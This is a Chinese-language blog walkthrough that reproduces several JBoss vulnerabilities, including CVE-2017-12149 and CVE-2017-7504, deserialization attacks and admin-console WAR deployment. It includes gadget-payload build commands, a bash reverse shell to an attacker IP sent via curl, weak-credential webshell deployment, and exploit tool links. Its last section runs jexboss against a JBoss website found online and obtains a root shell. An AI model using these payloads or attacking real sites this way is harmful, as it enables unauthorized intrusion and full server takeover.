JBOSS中间件漏洞总汇复现

Delina

原文链接：JBOSS中间件漏洞总汇复现
​
JBoss JMXInvokerServlet 反序列化漏洞漏洞复现直接使用docker搭建的漏洞环境。
环境搭建完成后，直接使用工具检测即可：工具下载地址https://cdn.vulhub.org/deserialization/DeserializeExploit.jar
环境启动以后，直接访问http://you-ip:8080。

​

使用下载的工具进行检测  java -jar DeserializeExploit.jar

​

执行命令
​
文件管理

​

JBoss 5.x/6.x 反序列化漏洞（CVE-2017-12149）参考链接：https://www.cnblogs.com/Hi-blog/p/7904443.html
漏洞背景该漏洞为 Java反序列化错误类型，存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化，从而导致了漏洞。
漏洞复现漏洞环境
靶机地址：192.168.10.144  服务端口:8080
测试机：192.168.10.150
搭建好环境，访问地址：
http://192.168.1.102:8080/
及 http://192.168.1.102:8080/invoker/readonly

​

​

响应码500，证明漏洞存在。
下载漏洞利用工具：http://scan.javasec.cn/java/JavaDeserH2HC.zip
​
先编译：

• 
  

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
​

设置反弹的IP和端口
​
这样就会将序列化对象保存在ReverseShellCommonsCollectionsHashMap.ser中，用curl命令发送到Jboss服务地址。
先在测试机运行nc命令，进入监听模式：

​

再打开另一个控制台，运行如下curl命令：

​

反弹成功

​

JBoss 4.x JBossMQ JMS 反序列化漏洞（CVE-2017-7504）前言序列化就是把对象转换成字节流，便于保存在内存、文件、数据库中；反序列化即逆过程，由字节流还原成对象。Java中的ObjectOutputStream类的writeObject()方法可以实现序列化，ObjectInputStream类的readObject()方法用于反序列化。问题的根源在于类ObjectInputStream在反序列化时，没有对生成的对象的类型做限制。

​

漏洞环境此次环境尝试用docker搭建。
靶机:
ip:192.168.10.144    操作系统：ubuntu18.0.4 LTS
攻击机：
ip:192.168.10.150    操作系统：kali
​​
一、环境搭建
　　1.docker的安装参考
　　　　https://www.howtoing.com/ubuntu-docker
　　2.安装完docker后，直接拉取vulhub的源码。
　　　　https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-7504
　　3.靶机启动服务
　　　　执行如下命令启动JBoss AS 4.0.5
　　　　　　docker-compose up -d
　　4.环境启动后，地址为http://192.168.112.132:8080/

​

漏洞复现一、exp准备：

•         https://github.com/joaomatosf/JavaDeserH2HC
  
  

　　用法：
​
二、exploit
　　1) 选择ExampleCommonsCollections1WithHashMap，编译并生成序列化数据
​
javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java   #编译
    java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/192.168.10.150/1234 0>&1"       #ser全称serialize，序列化恶意数据至文件。   
     第一行命令执行完成后，将生成一个文件ExampleCommonsCollections1WithHashMap.class
     第二行命令执行完成后，将生成一个文件ExampleCommonsCollections1WithHashMap.ser
​
2）发射：
   将该文件作为请求数据主体发送如下数据包：curl http://192.168.10.144:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser  # --data-binary 意为以二进制的方式post数据

​

   反弹成功

​

JBoss远程部署漏洞参考链接：https://www.cnblogs.com/Safe3/archive/2010/01/08/1642371.html
漏洞产生后端未对用户可控参数做严格的过滤。
漏洞危害导致任意命令执行，入侵者可以利用此漏洞直接获取webshell，进而对整个服务器进行控制。
漏洞复现​
直接使用docker搭建的漏洞环境。
访问：http://you-ip:8080/

​

   点击，访问后台 使用弱口令登陆（admin--admin）

​

   进入后台，如图所示

​

找到如下图所示的入口，点击进入

​

找到这个入口

​

在输入框中写入war压缩文件webshell的url地址，如上图
点击invoke执行界面获得一个jsp的webshell，（没有合适的jsp包）
​使用kali复现参考链接：https://blog.csdn.net/u011215939/article/details/79141624
所需工具：kallinux，jexboss，
获取工具：打开kalilinux，在kali终端中输入以下命令：
​
下载完成

​

运行 python jexboss.py

​

检验是否能够执行，可以执行就是如下：

​

  找一个jboos的网站，如图所示
​
将这个IP:8080复制到kalilinux中使用jexboss工具进行检测；

​

执行,工具会依次检测一下项目，有漏洞就会显示红色的：VULNERABLE(易受攻击的)，工具就会根据找到容易受到攻击的点，进行利用

​

然后选择yes，开始创建连接；

​

返回信息显示连接成功了；
​
现在获取了shell，开始执行shell命令了；返回的信息显示，这是一个linux操作系统；

​

执行几条命令看看；root权限

​

​